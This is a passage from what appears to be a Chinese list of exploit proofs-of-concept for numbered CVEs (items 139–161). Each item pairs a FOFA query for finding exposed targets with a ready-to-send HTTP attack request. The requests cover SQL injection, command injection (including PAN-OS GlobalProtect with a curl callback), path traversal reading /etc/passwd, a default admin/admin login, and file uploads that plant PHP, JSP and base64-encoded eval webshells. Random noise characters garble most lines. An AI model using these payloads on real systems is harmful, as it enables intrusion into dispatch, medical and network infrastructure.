139. 福建科立讯通信指挥调度平台editemedia.php sql注入- }1 v& X' C5 i! b) V$ n$ D! T
CVE-2024-2622
8 Z `1 Q0 s9 a: |4 @' \$ SFOFA:body="app/structure/departments.php" || app="指挥调度管理平台", q$ J# O* [; w& L! C" d
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1& s3 b: d1 e6 T! a% }, v2 u
Host: x.x.x.x
- Z7 p6 ]! {2 |2 f+ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& f4 d) e; x! N/ P3 ^- I7 Q3 J: S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 P b& d7 Z0 T* D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( N" x# q7 X* C2 R0 UAccept-Encoding: gzip, deflate, br' E7 h& f2 I+ i, K
Connection: close- y' E" K; T/ c7 z
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk0 U v5 B: }, m- F
Upgrade-Insecure-Requests: 1% y9 C7 \% n- s
- ?- w3 k) O$ c! s* O. w2 n$ j, r# O* N
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入8 q$ `: l: r! N' i& l
CVE-2024-2566
0 ]3 [( w: ^" R: m$ t' ?( i; `2 JFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 c8 O; ?4 I" j# t: N% U* b @
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1$ \8 R9 w- [* u& q
Host: x.x.x.x
# s5 [8 k' @2 I" o0 S6 h+ B$ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; `1 m/ M5 B c8 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ s }" G4 A8 h B, z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 L7 K, f8 R$ M+ R+ pAccept-Encoding: gzip, deflate, br
$ v5 h$ T& C3 |- k* o- HConnection: close
, g+ U" l0 T; m/ g6 s* OCookie: authcode=h8g9& V. z3 I! j; B. c# c
Upgrade-Insecure-Requests: 1, z3 V* u" N1 p) @& J1 z! `8 W- h
6 |5 r" Y& C5 d1 ?0 ?& L" }6 Q! ~; x9 T4 R, r
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
& |! I7 D( q) P, o6 W4 q% TFOFA:body="指挥调度管理平台"3 h4 s4 m# i7 N, L! }& M
POST /app/ext/ajax_users.php HTTP/1.15 u: i3 \; J8 ? `: g( G/ ]
Host: your-ip
6 `! W; q6 F5 f2 B+ T9 jUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info+ n- `6 C! u# o1 d/ r( a: J
Content-Type: application/x-www-form-urlencoded) D2 d5 Y- c6 d1 |
& ^7 B0 l3 }8 Q, D3 V9 M% F3 @9 _2 L0 O
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
2 o8 B" q# y$ G6 V) [0 {6 N. u: M9 a2 |
& B2 g B# T' I' R& K) p6 q2 [' T- g$ A5 T9 t. t
142. CMSV6车辆监控平台系统中存在弱密码
; c5 p: t2 ?3 t& `CVE-2024-296662 m& u& ^4 T. {- y1 e' M" Y
FOFA:body="/808gps/"/ p; W& Q$ y E
admin/admin1 k3 n; y4 P* t# o
143. Netis WF2780 v2.1.40144 远程命令执行: G7 t: Z# f3 o8 S3 ?5 z9 M# N5 u
CVE-2024-25850+ y+ ^2 D/ e" r" e6 m
FOFA:title='AP setup' && header='netis'
$ y, N+ o( K0 T% j/ ^$ Q8 b uPAYLOAD
! X/ |! W: m$ l$ y) H
6 J+ ~& y0 Q2 c, }; B1 `8 P144. D-Link nas_sharing.cgi 命令注入
; {( Z, s4 X: n3 A; g- fFOFA:app="D_Link-DNS-ShareCenter"% W5 K; {0 L4 F: v7 ]; P& @3 g! D
system参数用于传要执行的命令& n9 r* E4 O$ m$ e* M9 [0 o
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
, w; c* E& t2 D) b8 wHost: x.x.x.x
( x! n) ~) b1 AUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.08 s: k% {. Z7 e+ @9 \3 u
Connection: close: o$ s: A( b5 c5 R4 H
Accept: */*8 F) M7 s' t: K- q: [0 I
Accept-Language: en
/ Q" f; h) E6 q2 RAccept-Encoding: gzip
3 e8 M9 l) i8 _1 m( A1 b/ b3 K4 Z6 O: [! }' g& f9 M0 _
9 z1 R; d9 \' {3 A5 u
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
2 ]( v3 \+ N; g6 ]) wCVE-2024-3400
, k- \9 A- v' ]" b$ A* }3 KFOFA:icon_hash="-631559155"! w/ ^4 g6 e* a& Z; ]1 S
GET /global-protect/login.esp HTTP/1.1
' R* b; P! Z$ s1 i8 |" O- u& b. W. HHost: 192.168.30.112:1005
! G1 d! @# j, |* J: J8 P& n9 B) JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84) D1 q5 D7 A4 g
Connection: close
f! R& _; j: iCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;2 i* v+ p9 W4 \3 T
Accept-Encoding: gzip
1 k# r7 r' ]! H% K" G# y! d# S h
9 i2 L2 P' i" o6 V146. MajorDoMo thumb.php 未授权远程代码执行' S7 ^, Y0 i O
CNVD-2024-02175
- Q9 k! ?3 ?; y- s9 d8 i3 fFOFA:app="MajordomoSL"
7 a& j5 ~ C& Y- ~) x% d i& B# hGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
$ A5 r$ O0 q) Z) R3 e; Z y, HHost: x.x.x.x
: H7 Y4 |5 y, l$ o2 l: DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' Q6 p; b6 W, @9 {/ v; i% vAccept-Charset: utf-8
; l' j2 Y& e' q6 CAccept-Encoding: gzip, deflate5 E* [, z8 v; g7 T7 b. p; z7 {$ P
Connection: close/ J3 B, T( E+ h$ b; x+ `: n: p
7 f$ v" s: q2 @7 H, Z
" h0 J4 |5 [. Z1 B+ l. Q
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历: e! ^; u: r3 I1 S1 Q
CVE-2024-32399( a/ g0 I, `3 g4 _3 e2 r
FOFA:body="RaidenMAILD"& b. { U2 y& V# o3 H
GET /webeditor/../../../windows/win.ini HTTP/1.15 v; a2 b* C+ V) j1 S+ u
Host: 127.0.0.1:81 P# U$ C6 b7 y% G4 A8 I
Cache-Control: max-age=0
: T U4 x+ X6 p l2 N# {- JConnection: close% n2 @4 ^7 ~% A5 n
) H8 k3 n, p2 \$ V1 I7 V% @- R; b6 f" t$ E* S
148. CrushFTP 认证绕过模板注入
8 C7 X. k* m, L+ x3 m" E: K: z# qCVE-2024-40406 U- Q2 ?1 D, }+ |: z! a
FOFA:body="CrushFTP"" x' @! w1 L5 r9 k9 W9 D+ x
PAYLOAD8 f8 D/ C. ?' i/ V: d/ b* ?- J# |
" {8 x4 g8 b& @; ~) n3 k/ C( e5 m/ x
149. AJ-Report开源数据大屏存在远程命令执行( Q) u3 q a2 E
FOFA:title="AJ-Report"$ n8 l9 W( e$ f; m
4 Z y7 {# t" K* ?" w+ z
POST /dataSetParam/verification;swagger-ui/ HTTP/1.17 s0 p/ U0 }0 b
Host: x.x.x.x
5 e4 N, J3 h( H0 T+ Z5 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 ?$ ^' |- c/ d: C1 H* NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 P3 H; @/ N* X, g& l9 vAccept-Encoding: gzip, deflate, br& S4 _' U! x7 g6 O' X5 U7 n
Accept-Language: zh-CN,zh;q=0.9/ U; m& U9 _# u: m# n" P" ^
Content-Type: application/json;charset=UTF-87 N; w8 R' L& \/ j% O
Connection: close, @/ q6 U) f0 n0 c, J$ G8 J
! L! N L& S: G% k5 R& Q
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}2 `0 e* `% A* F1 t6 V9 z v
: b% P/ R+ ~+ ?' r! t4 g150. AJ-Report 1.4.0 认证绕过与远程代码执行! a ~7 p1 l; Q) N
FOFA:title="AJ-Report"5 r& D: c8 {. C* D
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1! n# N4 J2 G7 |6 z
Host: x.x.x.x
3 T, I8 X, y% |9 A1 K6 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% |$ j# v: o1 E( a( U( m- D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 [# o' M0 Q- [' B# R
Accept-Encoding: gzip, deflate, br
9 b ~8 }; Z$ m+ o# F- ~Accept-Language: zh-CN,zh;q=0.9
9 l) H* c& c+ W3 ^/ N) `1 TContent-Type: application/json;charset=UTF-8
7 b0 e/ y1 Y# i. ~* X" }5 D0 NConnection: close9 Z$ B# _+ ]+ D8 e/ d! p
Content-Length: 339
; ~( R# I" U8 h5 Z& e1 @
% S- ?2 l2 L& N5 L* j{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}9 G, `" i" H- j: j& c
+ c- N( x0 l, I% ]9 }0 g& ^" H# m! x# P" O
151. AJ-Report 1.4.1 pageList sql注入& U6 J0 q: D. N- t
FOFA:title="AJ-Report"
" v2 Z: r& M# \4 l: A9 ]GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
: i/ A5 D, m9 p# T2 HHost: x.x.x.x
: J+ t/ P0 F3 t1 Q/ y! [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# A% I0 c' ]3 E6 \& @Connection: close4 }* T, ? ]0 v: J8 A1 z @) x
Accept-Encoding: gzip
; u7 I+ @8 r2 l8 g/ K' b8 C- M% h( u7 L- s" m9 u$ T
" Y r: R2 U% ?5 o! D! S152. Progress Kemp LoadMaster 远程命令执行
" b8 c* b) O/ u. p* dCVE-2024-12128 b, g% Y' k: {4 k1 ^
LoadMaster <= 7.2.59.2 (GA)
; M) E& `/ H8 W0 }; x& HLoadMaster<=7.2.54.8 (LTSF)
3 h, `0 e3 G* S: kLoadMaster <= 7.2.48.10 (LTS)
" I0 Q& z# a8 z/ zFOFA:body="LoadMaster"
4 h/ ^: H9 L+ Z- t. }! S1 IJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
E/ N/ X. Q4 E5 t5 e& z3 oGET /access/set?param=enableapi&value=1 HTTP/1.1, `, i! h* C$ X& P
Host: x.x.x.x! q% E, @3 b8 q, y2 O9 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
B7 V2 D1 |1 ^- x% ]3 RConnection: close
3 Y. E7 H2 D$ x& WAccept: */*" _/ K1 \ E( W
Accept-Language: en, ], e' B% ~, X- Z6 {( {! I
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=/ [- @# w. Z% z
Accept-Encoding: gzip+ T) F# C/ e- R* Q
0 k& X8 }% K- Y( c7 {
+ `0 P. d0 _7 B: ^% o153. gradio任意文件读取. s5 | k3 _. g( T+ ]- L
CVE-2024-1561FOFA:body="__gradio_mode__"
6 L3 X1 ^: v' R7 ^& f) l第一步,请求/config文件获取componets的id
) |1 w1 r% C3 f9 Khttp://x.x.x.x/config
' D, Y. ~2 |( Q* | I, w. S- X# U' O) N" A7 D/ n
) y0 Z6 C) s# ]2 r. K. k( q, P
第二步,将/etc/passwd的内容写入到一个临时文件
3 ]- q! D3 A1 B' J" {, S9 EPOST /component_server HTTP/1.1
% E: P* |8 a/ B- a4 wHost: x.x.x.x6 K% O8 K4 R% f3 t' L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
- J' u2 F3 S zConnection: close
# O2 L# P/ B4 f9 B% KContent-Length: 115- k* l9 Q# a2 z$ o7 O5 o
Content-Type: application/json
% n( [( J8 @2 G8 s& k/ GAccept-Encoding: gzip
7 e3 A f; ?) k+ \6 B/ P' P
% R/ _/ |6 G% T* S# ^6 a3 c{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}1 p$ f) X' X7 D7 L8 K
8 ~- y/ l2 \" Z( p
0 N4 A' R* h& l1 A" `/ {第三步访问
3 [6 j! S# J6 ?' x, ^6 }* i2 vhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd8 F# k9 F* j) c, k
8 `& Q# h! ?3 \2 Y0 ^
/ t4 r$ q" y. C: `8 O- @/ q154. 天维尔消防救援作战调度平台 SQL注入7 `. H+ v4 P j+ @2 E% O k% b! a
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入", x4 \" f7 o; `7 O, F
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
$ e: P% n! ?& C% p0 |. RHost: x.x.x.x& N/ m; T- }" r- _' I
Content-Length: 106
3 p9 h3 I* v0 Z! F0 I$ ^2 U' \# GCache-Control: max-age=0
+ E5 B0 ]" {, g' u* n4 EUpgrade-Insecure-Requests: 1% h1 B; D* U9 s" ^- N$ l! T* i
Origin: http://x.x.x.x
8 }( X# ?- h/ \/ h mContent-Type: application/json
9 O s; Z; z3 h2 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
* C J4 c4 E+ _" |& H- j6 J$ M# lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- K, ^: H8 l' ]4 G% T/ k: Y
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
: _* ]: h8 T( p j- YAccept-Encoding: gzip, deflate6 R: j. R/ V/ ?3 G
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7$ @! \1 I$ P# r2 Q- ]
Connection: close
J. H, `4 m2 r8 G6 r0 P, V/ O# {- E- _0 q1 T6 N' V% w
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}. z O: [3 Z! q# J' T
/ [7 J, a! N) Y7 R7 d8 G1 V
! m& W* N/ s5 x- S Y* A/ I155. 六零导航页 file.php 任意文件上传
5 v0 q' I6 s& MCVE-2024-34982
0 Y8 D4 G. K' tFOFA:title=="上网导航 - LyLme Spage"; H, l C3 V4 a
POST /include/file.php HTTP/1.1
% [. C( [8 Y$ U/ o3 QHost: x.x.x.x" j( u, ~6 D% A$ \3 C) P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 ? v+ U' {% S: a" R
Connection: close
' u' {+ o8 R1 @Content-Length: 2320 A$ ~! _# ~' V( \* F9 s
Accept: application/json, text/javascript, */*; q=0.01
3 d& M8 p E+ t/ i$ L6 M8 NAccept-Encoding: gzip, deflate, br
' E- E. u- ^/ cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; a7 H; Q8 C! ~
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
5 N8 c0 T9 {* P" GX-Requested-With: XMLHttpRequest/ R3 J4 ?1 Y2 L+ G, s
7 J# k4 r$ w g, ^, Q
-----------------------------qttl7vemrsold314zg0f
: U7 I! A5 u) ?. K+ e: o3 d7 ]9 FContent-Disposition: form-data; name="file"; filename="test.php"0 z P% X8 N0 h% I4 k* B
Content-Type: image/png
$ c2 S; I! q% M3 W& K2 S7 {& ~: Y9 k+ O* M0 s) z( E0 c
<?php phpinfo();unlink(__FILE__);?>8 Q3 d# C5 i5 @! S
-----------------------------qttl7vemrsold314zg0f--
: O4 e! @, [ g8 T( b7 y- y; B [4 t0 J, L/ i& \. k K) M; u
" E0 ]# `1 G2 t/ K1 [' S* i3 ?+ J
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php) M1 z7 n, @' i+ T8 y6 B# D7 Q, v, g
: L1 s8 V8 w: v8 M$ \
156. TBK DVR-4104/DVR-4216 操作系统命令注入
) j( {5 y& ?- s! {CVE-2024-3721
* _, C4 {. _& pFOFA:"Location: /login.rsp"0 t4 x& N* m9 u, P/ Z
·TBK DVR-4104
7 T3 B3 G& n t4 ?8 `4 z! |·TBK DVR-4216
( o: {& A" }. W8 q9 U+ Ycurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"0 p+ s0 N7 z& V6 `# g! c
7 C1 s0 R( o \- z G! F! X
/ n/ N) d* {2 z6 t* l0 H# c$ C; J# aPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1- ?! J6 a& E7 M& R: ?# v, i: Y; z
Host: x.x.x.x4 A: Y% s2 X% ]0 z" s
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, J5 p$ ~& J4 y) P& L& j: B
Connection: close
! u: d" @. y6 V1 ^# i4 Q; i8 Z7 bContent-Length: 0
+ Q, \! F# b- `1 x, RCookie: uid=15 `7 }5 x3 X% w7 A0 T# {! h
Accept-Encoding: gzip
$ q9 r _% m0 _/ K- s% Y: ]7 S* d
0 h; q- [/ H$ d157. 美特CRM upload.jsp 任意文件上传& A f4 p9 m. P0 y8 @: }
CNVD-2023-06971
* t9 h( W( j& xFOFA:body="/common/scripts/basic.js"
% F% I( c d$ v4 ?! NPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.19 ]$ z: E# W: c
Host: x.x.x.x% q2 A/ f$ X Y5 V2 z' I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.362 Y& X9 b! I; L0 N! i, R4 C
Content-Length: 709 [, G# Z) K9 W6 O$ v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' T: _8 u8 |6 G/ M. |" B* t- V3 e
Accept-Encoding: gzip, deflate
7 m4 \( {& b0 E# d3 O/ O: ZAccept-Language: zh-CN,zh;q=0.9 v# t) m: P) q/ W. I
Cache-Control: max-age=04 R( E; H# X+ f
Connection: close" _7 @! w! r4 x7 b3 X. f+ g# C8 o, Q( l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
- h9 |: \* I1 e% s* I, N* ~Upgrade-Insecure-Requests: 1
0 I! o: `* S3 _ B; n
2 P- Q H0 Y6 l( s7 l' F------WebKitFormBoundary1imovELzPsfzp5dN/ g/ k% z; r5 U0 R% W- g3 E# B" ]) D) @+ ~
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"6 z; ]) c- V& R, W
Content-Type: application/octet-stream3 Q! ^2 l: S2 ]3 f1 J, r" b
0 b% P, Y! ?- s: \: ]1 c |nyhelxrutzwhrsvsrafb, t5 k% P6 m& b& ^8 O" e2 |
------WebKitFormBoundary1imovELzPsfzp5dN0 s% |* b) ]# K0 g7 f* s) ?
Content-Disposition: form-data; name="key"
3 H& c' r8 [( Z' _1 T
2 c3 F. J/ Y5 I% f dnull0 @' x% e. K6 l8 W$ T2 C. F" ~% p3 i( u
------WebKitFormBoundary1imovELzPsfzp5dN- q. u8 W' K* q2 x
Content-Disposition: form-data; name="form"
) {" t/ q2 P* f( y) ^" F3 P' b) w3 i5 U( c" p9 e6 ^( U1 Q- @
null
* E; g- y) @7 N' F------WebKitFormBoundary1imovELzPsfzp5dN9 A+ C, a9 K+ h0 _' }/ e
Content-Disposition: form-data; name="field"' \; O) ~9 F" V( F0 ]9 {
3 E" h6 h3 h) a+ q7 q% g4 e+ }. I, R8 tnull8 {3 d' I3 U( r. H
------WebKitFormBoundary1imovELzPsfzp5dN! R/ c0 N3 @" u- }0 ~4 }
Content-Disposition: form-data; name="filetitile"1 a% g: n% H# d4 X
8 k9 o) e- ~; X# {# o; V3 ~" a" K' H3 bnull- }: _, a3 T' f, c- j+ R6 I
------WebKitFormBoundary1imovELzPsfzp5dN
" R" H! t8 d6 [7 b) }' NContent-Disposition: form-data; name="filefolder"
8 p# E* I. ?1 f, W; i8 w. a# k" r3 k$ u; Q6 z4 Y" v
null
: @4 f( _3 @" @5 a" h------WebKitFormBoundary1imovELzPsfzp5dN--
; H& k5 x0 p. }4 `; d$ \6 E2 B3 I1 Q8 s7 A* d3 I* K$ P1 `" W
% @0 U2 z/ h5 ]3 Y; [0 O8 Vhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp# ^7 t I, ]6 W! @7 n/ ?2 h
?: U+ b9 {$ B% @158. Mura-CMS-processAsyncObject存在SQL注入
/ r+ Y( {. _1 U5 m$ CCVE-2024-32640
. r: [3 [- W( LFOFA:"Generator: Masa CMS"/ g+ A) t% S( @/ _. `
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.11 {3 j( E6 @' K$ i
Host: {{Hostname}}
p) J9 n$ g1 M, zContent-Type: application/x-www-form-urlencoded
* f6 Y J, b' q- }8 H _( ~
4 ` E3 ~+ {9 d Oobject=displayregion&contenthistid=x\'&previewid=1' C# V( K2 z+ E6 }& W6 W2 M0 r$ C
3 r9 ^5 @2 A# U
$ W3 v( y" c# V( C
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传- w+ S" C! V( g9 Z3 [* a" s! p
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")) I" h* I. e/ M
POST /webservices/WebJobUpload.asmx HTTP/1.1: v/ A7 [4 ]( G2 }! P
Host: x.x.x.x; ]& `7 L- d. I9 m! U- l3 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
$ m+ m I& x6 N( d/ i' I/ eContent-Length: 1080
0 f+ b- V ?2 p' TAccept-Encoding: gzip, deflate
0 D$ v# u% m! ? R- [Connection: close+ L. r$ R7 \% L' p( c# f7 D3 W
Content-Type: text/xml; charset=utf-8! u- P& R' k$ Y, P p) b4 S
Soapaction: "http://rainier/jobUpload"
- I6 f- }" `8 \0 n% }0 _/ Y
. W$ n; Z$ t6 z4 @9 [<?xml version="1.0" encoding="utf-8"?>
: d* \3 p5 I5 t9 o<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
: d/ i) {+ g; z2 j8 A: h4 E. F: t% N<soap:Body>& {! z; J M: x9 m
<jobUpload xmlns="http://rainier">& c. }4 H# _1 {+ X6 A: p4 \- v; y
<vcode>1</vcode>8 m' S7 Z1 \& ]
<subFolder></subFolder>. o/ M! P4 f. z; f8 T
<fileName>abcrce.asmx</fileName>
6 y4 }* e0 N: Y" w0 y9 Z<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
7 i, e. s6 W1 H1 r$ K& R$ a- o% o</jobUpload>
( p; D+ j4 p c: ?</soap:Body>
! {# V2 u5 c1 u3 ]) {) K</soap:Envelope>
+ T2 ]; l7 @: V+ Z" K0 K1 S
& J: N0 e) j3 Y/ C) n
8 U' @& h" R/ H2 i, }. }" u/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
" \' f, C v' J0 t1 L6 j1 s" R' u' _! f" q% @# n: P
0 u9 d. a) |/ S# v160. Sonatype Nexus Repository 3目录遍历与文件读取2 r4 X4 K- B: h# |+ r* o/ C
CVE-2024-4956- y# |( _: P/ P. t
FOFA:title="Nexus Repository Manager"* ]# M3 V6 V3 `- v! O7 Y
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1( D4 n8 L* i% i4 C- [( D
Host: x.x.x.x+ r0 c& _$ z( p1 m0 ]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0: F3 k+ W# e& g5 g
Connection: close! I9 u4 O! V, M
Accept: */*
" ?8 M2 _3 n& z! g8 v0 jAccept-Language: en
# p, O! q0 t: t: [& w0 tAccept-Encoding: gzip
7 S8 M Q' K% Y. v9 w4 C6 G$ n2 s6 E q* k+ s
* E( f [* s& n) |1 g+ N7 `9 t
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
4 g' k5 i) n6 g: M5 QFOFA:body="/KT_Css/qd_defaul.css"$ e K( R# I! p9 X" F
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
. i3 @; w0 m! p: tPOST /Webservice.asmx HTTP/1.1% c) l. U( `: ?# o4 d3 `2 J3 z: k+ F
Host: x.x.x.x
f& X4 N% C; I+ C, [: d* KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36& ~; N0 M A- H; g; b! k- h- `+ e6 R
Connection: close/ T2 J. _5 N& ]4 c1 j; D' b
Content-Length: 4459 ]8 X4 [' E* M6 {+ W0 D
Content-Type: text/xml
4 X. b, `6 Z' L" i5 J' A5 L3 kAccept-Encoding: gzip
. v$ M$ C! W( _) J: X% K8 `3 W2 h
<?xml version="1.0" encoding="utf-8"?>
0 c, t3 q* v+ {& U$ [' i<soap:Envelope xmlns:xsi="
. b/ F- B5 w/ yhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema": Y3 K5 O) J% ?+ w/ [6 ~6 ^
